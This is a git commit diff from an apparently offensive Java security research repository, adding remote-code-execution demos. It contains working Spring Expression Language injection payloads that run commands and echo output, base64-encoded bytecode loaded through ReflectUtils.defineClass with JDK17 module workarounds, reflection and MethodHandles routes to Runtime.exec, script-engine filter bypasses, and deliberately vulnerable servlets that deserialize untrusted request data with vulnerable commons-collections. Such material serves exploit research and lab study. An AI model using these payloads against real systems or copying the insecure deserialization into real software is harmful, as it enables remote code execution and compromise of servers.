add jdk17 demo :)

Author: Whoopsunix

Command/src/main/java/org/command/code/ScriptEngineDemo.java

@@ -1,7 +1,5 @@
 package org.command.code;
 
-import org.ppp.tools.encryption.B64;
-
 import javax.script.ScriptEngine;
 import javax.script.ScriptEngineFactory;
 import javax.script.ScriptEngineManager;
@@ -83,6 +81,7 @@ public static void exec() throws Exception {
 
         // type()
         String type = "var JavaTest= Java.type(\"java.lang\"+\".Runtime\"); var b =JavaTest.getRuntime(); b.exec(\"open -a Calculator.app\");";
+        System.out.println(type);
 //        engine.eval(type);
 
         // Rhino
@@ -98,7 +97,6 @@ public static void exec() throws Exception {
         // 注释符
         String comment1 = "java.lang./**/Runtime.getRuntime().exec(\"open -a Calculator.app\")";
         String comment2 = "java.lang.//\nRuntime.getRuntime().exec(\"open -a Calculator.app\")";
-        engine.eval(comment2);
 
 
     }

Command/src/main/java/org/command/exec/MethodHandlesRuntime.java

@@ -0,0 +1,27 @@
+package org.command.exec;
+
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+
+/**
+ * @author Whoopsunix
+ */
+public class MethodHandlesRuntime {
+    public static void main(String[] args) throws Throwable {
+        String cmd = "open -a Calculator.app";
+        original(cmd);
+    }
+
+    public static void original(String cmd) throws Exception {
+        Class<?> cls = Class.forName("java.lang.Runtime");
+        Object runtime = cls.getMethod("getRuntime").invoke(null);
+        cls.getMethod("exec", String.class).invoke(runtime, cmd);
+    }
+
+    public static void methodHandles(String cmd) throws Throwable {
+        Class<?> cls = Class.forName("java.lang.Runtime");
+        MethodHandle execMethod = MethodHandles.lookup().findVirtual(cls, "exec", MethodType.methodType(Process.class, String.class));
+        execMethod.invoke(cls.getMethod("getRuntime").invoke(null), cmd);
+    }
+}

Expression/SPELAttack/src/main/java/com/example/spelattack/SPEL.java

@@ -15,10 +15,12 @@ public static void main(String[] args) {
         /**
          * 命令执行
          */
+        String version = "{T(java.lang.System).getProperty('java.version')}";
         // 无回显
         String runtime = "T(java.lang.Runtime).getRuntime().exec('open -a Calculator.app')";
         // 回显
         String runtimeEcho = "new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('ifconfig').getInputStream()).useDelimiter(\"\\\\A\").next()";
+        String processBuilderEcho = "{new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(\"bash\", \"-c\", \"whoami\").start().getInputStream(), \"gbk\")).readLine()}";
 
         /**
          * 探测
@@ -30,12 +32,25 @@ public static void main(String[] args) {
         String sleep = "T(java.lang.Thread).sleep(10000)";
 
         /**
-         * todo 类加载
+         * 类加载
          */
+        // sun.misc.BASE64Decoder
+        String classLoad1 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.example.Exec',new sun.misc.BASE64Decoder().decodeBuffer('yv66vgAAADQAMgoACwAZCQAaABsIABwKAB0AHgoAHwAgCAAhCgAfACIHACMIACQHACUHACYBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEkxvcmcvZXhhbXBsZS9FeGVjOwEADVN0YWNrTWFwVGFibGUHACUHACMBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAAlFeGVjLmphdmEMAAwADQcAJwwAKAApAQAERXhlYwcAKgwAKwAsBwAtDAAuAC8BABZvcGVuIC1hIENhbGN1bGF0b3IuYXBwDAAwADEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQALc3RhdGljIEV4ZWMBABBvcmcvZXhhbXBsZS9FeGVjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAKAAsAAAAAAAIAAQAMAA0AAQAOAAAAdgACAAIAAAAaKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAETLEAAQAEABUAGAAIAAMADwAAABoABgAAAAcABAAJAAwACgAVAAwAGAALABkADQAQAAAADAABAAAAGgARABIAAAATAAAAEAAC/wAYAAEHABQAAQcAFQAACAAWAA0AAQAOAAAAWwACAAEAAAAWsgACEgm2AAS4AAUSBrYAB1enAARLsQABAAAAEQAUAAgAAwAPAAAAFgAFAAAAEQAIABIAEQAUABQAEwAVABUAEAAAAAIAAAATAAAABwACVAcAFQAAAQAXAAAAAgAY'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader()))}";
+        String classLoad2 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.example.Exec',T(java.util.Base64).getDecoder().decode('yv66vgAAADQAMgoACwAZCQAaABsIABwKAB0AHgoAHwAgCAAhCgAfACIHACMIACQHACUHACYBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEkxvcmcvZXhhbXBsZS9FeGVjOwEADVN0YWNrTWFwVGFibGUHACUHACMBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAAlFeGVjLmphdmEMAAwADQcAJwwAKAApAQAERXhlYwcAKgwAKwAsBwAtDAAuAC8BABZvcGVuIC1hIENhbGN1bGF0b3IuYXBwDAAwADEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQALc3RhdGljIEV4ZWMBABBvcmcvZXhhbXBsZS9FeGVjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAKAAsAAAAAAAIAAQAMAA0AAQAOAAAAdgACAAIAAAAaKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAETLEAAQAEABUAGAAIAAMADwAAABoABgAAAAcABAAJAAwACgAVAAwAGAALABkADQAQAAAADAABAAAAGgARABIAAAATAAAAEAAC/wAYAAEHABQAAQcAFQAACAAWAA0AAQAOAAAAWwACAAEAAAAWsgACEgm2AAS4AAUSBrYAB1enAARLsQABAAAAEQAUAAgAAwAPAAAAFgAFAAAAEQAIABIAEQAUABQAEwAVABUAEAAAAAIAAAATAAAABwACVAcAFQAAAQAXAAAAAgAY'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader()))}";
+        classLoad2 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.example.Exec',T(java.util.Base64).getDecoder().decode('yv66vgAAADQAMgoACwAZCQAaABsIABwKAB0AHgoAHwAgCAAhCgAfACIHACMIACQHACUHACYBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEkxvcmcvZXhhbXBsZS9FeGVjOwEADVN0YWNrTWFwVGFibGUHACUHACMBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAAlFeGVjLmphdmEMAAwADQcAJwwAKAApAQAERXhlYwcAKgwAKwAsBwAtDAAuAC8BABZvcGVuIC1hIENhbGN1bGF0b3IuYXBwDAAwADEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQALc3RhdGljIEV4ZWMBABBvcmcvZXhhbXBsZS9FeGVjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAKAAsAAAAAAAIAAQAMAA0AAQAOAAAAdgACAAIAAAAaKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAETLEAAQAEABUAGAAIAAMADwAAABoABgAAAAcABAAJAAwACgAVAAwAGAALABkADQAQAAAADAABAAAAGgARABIAAAATAAAAEAAC/wAYAAEHABQAAQcAFQAACAAWAA0AAQAOAAAAWwACAAEAAAAWsgACEgm2AAS4AAUSBrYAB1enAARLsQABAAAAEQAUAAgAAwAPAAAAFgAFAAAAEQAIABIAEQAUABQAEwAVABUAEAAAAAIAAAATAAAABwACVAcAFQAAAQAXAAAAAgAY'),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName(\"org.springframework.expression.ExpressionParser\"))}";
 
+        /**
+         * 高版本利用
+         */
+        // (java.lang.Thread).currentThread().getContextClassLoader()
+        // 命名模块
+        String classLoadJDK17_1 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.springframework.expression.Test',T(java.util.Base64).getDecoder().decode('yv66vgAAADQALwoACgAXCQAYABkIABoKABsAHAoAHQAeCAAfCgAdACAHACEHACIHACMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAJUxvcmcvc3ByaW5nZnJhbWV3b3JrL2V4cHJlc3Npb24vVGVzdDsBAAg8Y2xpbml0PgEADVN0YWNrTWFwVGFibGUHACEBAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAALAAwHACQMACUAJgEAC3N0YXRpYyBFeGVjBwAnDAAoACkHACoMACsALAEAFm9wZW4gLWEgQ2FsY3VsYXRvci5hcHAMAC0ALgEAE2phdmEvbGFuZy9FeGNlcHRpb24BACNvcmcvc3ByaW5nZnJhbWV3b3JrL2V4cHJlc3Npb24vVGVzdAEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEACQAKAAAAAAACAAEACwAMAAEADQAAAC8AAQABAAAABSq3AAGxAAAAAgAOAAAABgABAAAABgAPAAAADAABAAAABQAQABEAAAAIABIADAABAA0AAABbAAIAAQAAABayAAISA7YABLgABRIGtgAHV6cABEuxAAEAAAARABQACAADAA4AAAAWAAUAAAAJAAgACgARAAwAFAALABUADQAPAAAAAgAAABMAAAAHAAJUBwAUAAABABUAAAACABY='),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName(\"org.springframework.expression.ExpressionParser\"))}";
+
+        // (java.lang.ClassLoader).getSystemClassLoader()
+        String classLoadJDK17_2 = "{T(org.springframework.cglib.core.ReflectUtils).defineClass('org.springframework.expression.Test',T(java.util.Base64).getDecoder().decode('yv66vgAAADQALwoACgAXCQAYABkIABoKABsAHAoAHQAeCAAfCgAdACAHACEHACIHACMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAJUxvcmcvc3ByaW5nZnJhbWV3b3JrL2V4cHJlc3Npb24vVGVzdDsBAAg8Y2xpbml0PgEADVN0YWNrTWFwVGFibGUHACEBAApTb3VyY2VGaWxlAQAJVGVzdC5qYXZhDAALAAwHACQMACUAJgEAC3N0YXRpYyBFeGVjBwAnDAAoACkHACoMACsALAEAFm9wZW4gLWEgQ2FsY3VsYXRvci5hcHAMAC0ALgEAE2phdmEvbGFuZy9FeGNlcHRpb24BACNvcmcvc3ByaW5nZnJhbWV3b3JrL2V4cHJlc3Npb24vVGVzdAEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEACQAKAAAAAAACAAEACwAMAAEADQAAAC8AAQABAAAABSq3AAGxAAAAAgAOAAAABgABAAAABgAPAAAADAABAAAABQAQABEAAAAIABIADAABAA0AAABbAAIAAQAAABayAAISA7YABLgABRIGtgAHV6cABEuxAAEAAAARABQACAADAA4AAAAWAAUAAAAJAAgACgARAAwAFAALABUADQAPAAAAAgAAABMAAAAHAAJUBwAUAAABABUAAAACABY='),T(java.lang.ClassLoader).getSystemClassLoader(), null, T(java.lang.Class).forName(\"org.springframework.expression.ExpressionParser\"))}";
 
 
-        Object obj = spel(runtime);
+        Object obj = spel(classLoadJDK17_1);
         System.out.println(obj);
     }
 

MemShellAndRceEcho/JakartaTomcatDemo/pom.xml

@@ -13,8 +13,8 @@
         <dependency>
             <groupId>org.apache.tomcat</groupId>
             <artifactId>tomcat-catalina</artifactId>
-            <version>10.0.23</version>
-<!--            <version>11.0.0-M1</version>-->
+<!--            <version>10.0.23</version>-->
+            <version>11.0.0-M1</version>
         </dependency>
 <!--        <dependency>-->
 <!--            <groupId>javax.servlet</groupId>-->

MemShellAndRceEcho/JavaxTomcatDemo/pom.xml

@@ -13,12 +13,11 @@
         <dependency>
             <groupId>org.apache.tomcat</groupId>
             <artifactId>tomcat-catalina</artifactId>
-            <!--            <version>7.0.59</version>-->
-            <!--            <version>7.0.109</version>-->
-<!--                                    <version>8.0.53</version>-->
-            <version>8.5.82</version>
-            <!--            <version>9.0.65</version>-->
-            <!--            <version>10.0.23</version>-->
+<!--                        <version>7.0.59</version>-->
+<!--                        <version>7.0.109</version>-->
+                                    <version>8.0.53</version>
+<!--            <version>8.5.82</version>-->
+<!--                        <version>9.0.65</version>-->
         </dependency>
         <dependency>
             <groupId>commons-fileupload</groupId>
@@ -59,6 +58,11 @@
             <artifactId>c3p0</artifactId>
             <version>0.9.5.2</version>
         </dependency>
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>fastjson</artifactId>
+            <version>1.2.83</version>
+        </dependency>
 
         <dependency>
             <groupId>org.ppp.tools</groupId>

MemShellAndRceEcho/LowTomcatDemo/pom.xml

@@ -0,0 +1,100 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+    <artifactId>LowTomcatDemo</artifactId>
+    <groupId>com.demo</groupId>
+    <version>1.0-SNAPSHOT</version>
+    <modelVersion>4.0.0</modelVersion>
+    <packaging>war</packaging>
+    <name>LowTomcatDemo</name>
+
+
+    <dependencies>
+
+<!--        <dependency>-->
+<!--            <groupId>org.apache.tomcat</groupId>-->
+<!--            <artifactId>tomcat-catalina</artifactId>-->
+<!--            &lt;!&ndash;            <version>7.0.59</version>&ndash;&gt;-->
+<!--                        <version>7.0.109</version>-->
+<!--        </dependency>-->
+        <dependency>
+            <groupId>commons-fileupload</groupId>
+            <artifactId>commons-fileupload</artifactId>
+            <version>1.5</version>
+        </dependency>
+        <dependency>
+            <groupId>javax.servlet</groupId>
+            <artifactId>servlet-api</artifactId>
+            <version>2.5</version>
+        </dependency>
+        <dependency>
+            <groupId>javax.servlet.jsp</groupId>
+            <artifactId>jsp-api</artifactId>
+            <version>2.2</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-collections4</artifactId>
+            <version>4.0</version>
+        </dependency>
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <!--<version>3.1</version>-->
+            <!--            <version>3.2</version>-->
+            <version>3.2.1</version>
+            <!--            <version>3.2.2</version>-->
+        </dependency>
+        <dependency>
+            <groupId>com.mchange</groupId>
+            <artifactId>c3p0</artifactId>
+            <version>0.9.5.2</version>
+        </dependency>
+
+
+        <dependency>
+            <groupId>org.ppp.tools</groupId>
+            <artifactId>Utils</artifactId>
+            <version>1.0-SNAPSHOT</version>
+        </dependency>
+
+        <dependency>
+            <groupId>me.gv7.tools</groupId>
+            <artifactId>java-object-searcher</artifactId>
+            <version>0.1.0</version>
+        </dependency>
+
+    </dependencies>
+
+
+    <build>
+        <resources>
+            <resource>
+                <directory>src/main/java</directory>
+                <includes>
+                    <include>**/*.properties</include>
+                    <include>**/*.xml</include>
+                </includes>
+            </resource>
+            <resource>
+                <directory>src/main/resources</directory>
+                <includes>
+                    <include>**/*.properties</include>
+                    <include>**/*.xml</include>
+                </includes>
+                <filtering>false</filtering>
+            </resource>
+        </resources>
+        <finalName>JavaxTomcatDemo</finalName>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <configuration>
+                    <source>8</source>
+                    <target>8</target>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
+</project>

MemShellAndRceEcho/LowTomcatDemo/src/main/java/com/demo/servlet/Base64DeSerializerServlet.java

@@ -0,0 +1,35 @@
+package com.demo.servlet;
+
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.ByteArrayInputStream;
+import java.io.ObjectInputStream;
+import java.util.Base64;
+
+public class Base64DeSerializerServlet extends HttpServlet {
+    @Override
+    protected void doGet(HttpServletRequest req, HttpServletResponse resp) {
+        String cmd = req.getParameter("cmd");
+        System.out.println(cmd);
+    }
+
+    @Override
+    protected void doPost(HttpServletRequest req, HttpServletResponse resp) {
+        try {
+            // 反序列化
+            String base64Str = req.getParameter("base64Str");
+            System.out.println(base64Str);
+            byte[] bytes = Base64.getDecoder().decode(base64Str);
+            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
+            ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
+            objectInputStream.readObject();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+}
+
+
+

MemShellAndRceEcho/LowTomcatDemo/src/main/java/com/demo/servlet/BinaryDeSerializerServlet.java

@@ -0,0 +1,64 @@
+//package com.demo.servlet;
+//
+//import org.apache.commons.fileupload.FileItem;
+//import org.apache.commons.fileupload.FileItemFactory;
+//import org.apache.commons.fileupload.disk.DiskFileItemFactory;
+//import org.apache.commons.fileupload.servlet.ServletFileUpload;
+//
+//import javax.servlet.annotation.MultipartConfig;
+//import javax.servlet.http.HttpServlet;
+//import javax.servlet.http.HttpServletRequest;
+//import javax.servlet.http.HttpServletResponse;
+//import java.io.InputStream;
+//import java.io.ObjectInputStream;
+//import java.util.Collection;
+//import java.util.Iterator;
+//
+//@MultipartConfig
+//public class BinaryDeSerializerServlet extends HttpServlet {
+//    @Override
+//    protected void doGet(HttpServletRequest req, HttpServletResponse resp) {
+//        String cmd = req.getParameter("cmd");
+//        System.out.println(cmd);
+//    }
+//
+//    @Override
+//    protected void doPost(HttpServletRequest request, HttpServletResponse response) {
+//        try {
+//            // 检查请求是否包含文件上传
+//            if (ServletFileUpload.isMultipartContent(request)) {
+//                // 创建文件项目工厂
+//                FileItemFactory factory = new DiskFileItemFactory();
+//
+//                // 创建上传处理器
+//                ServletFileUpload upload = new ServletFileUpload(factory);
+//
+//                // 解析请求，获取文件项集合
+//                @SuppressWarnings("unchecked")
+//                Collection<FileItem> items = upload.parseRequest(request);
+//
+//                Iterator<FileItem> iterator = items.iterator();
+//                while (iterator.hasNext()) {
+//                    FileItem item = iterator.next();
+//
+//                    // 判断是否为普通表单字段还是文件上传字段
+//                    if (!item.isFormField()) {
+//                        // 获取上传文件的输入流
+//                        InputStream inputStream = item.getInputStream();
+//
+//                        // 使用对象输入流进行反序列化
+//                        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
+//                        Object deserializedObject = objectInputStream.readObject();
+//                        objectInputStream.close();
+//                    }
+//                }
+//            }
+//        } catch (Exception e) {
+//            e.printStackTrace();
+//        }
+//    }
+//
+//}
+//
+//
+//

MemShellAndRceEcho/LowTomcatDemo/src/main/java/com/demo/utils/PayloadMake.java

@@ -0,0 +1,48 @@
+package com.demo.utils;
+
+import me.gv7.tools.josearcher.entity.Blacklist;
+import me.gv7.tools.josearcher.entity.Keyword;
+import me.gv7.tools.josearcher.searcher.SearchRequstByBFS;
+
+import java.util.ArrayList;
+import java.util.List;
+
+
+/**
+ * @author Whoopsunix
+ */
+public class PayloadMake {
+    public static void main(String[] args) throws Exception {
+        new PayloadMake().searchTomcat();
+    }
+
+//    public static void cc4() throws Exception {
+//        Class msmClass = TomcatEcho.class;
+//        CC4Generator cc4Generator = new CC4Generator();
+//        String payload = cc4Generator.make(msmClass);
+//        System.out.println(payload.length());
+//        cc4Generator.makeFile(msmClass, "cc4.bin");
+//    }
+
+    public void searchTomcat() {
+        //设置搜索类型包含Request关键字的对象
+        List<Keyword> keys = new ArrayList<>();
+        keys.add(new Keyword.Builder().setField_type("Request").build());
+        //定义黑名单
+        List<Blacklist> blacklists = new ArrayList<>();
+        blacklists.add(new Blacklist.Builder().setField_type("java.io.File").build());
+        //新建一个广度优先搜索Thread.currentThread()的搜索器
+        SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(), keys);
+        // 设置黑名单
+        searcher.setBlacklists(blacklists);
+        //打开调试模式,会生成log日志
+        searcher.setIs_debug(true);
+        //挖掘深度为20
+        searcher.setMax_search_depth(20);
+        //设置报告保存位置
+        searcher.setReport_save_path("/tmp/");
+        searcher.searchObject();
+    }
+
+
+}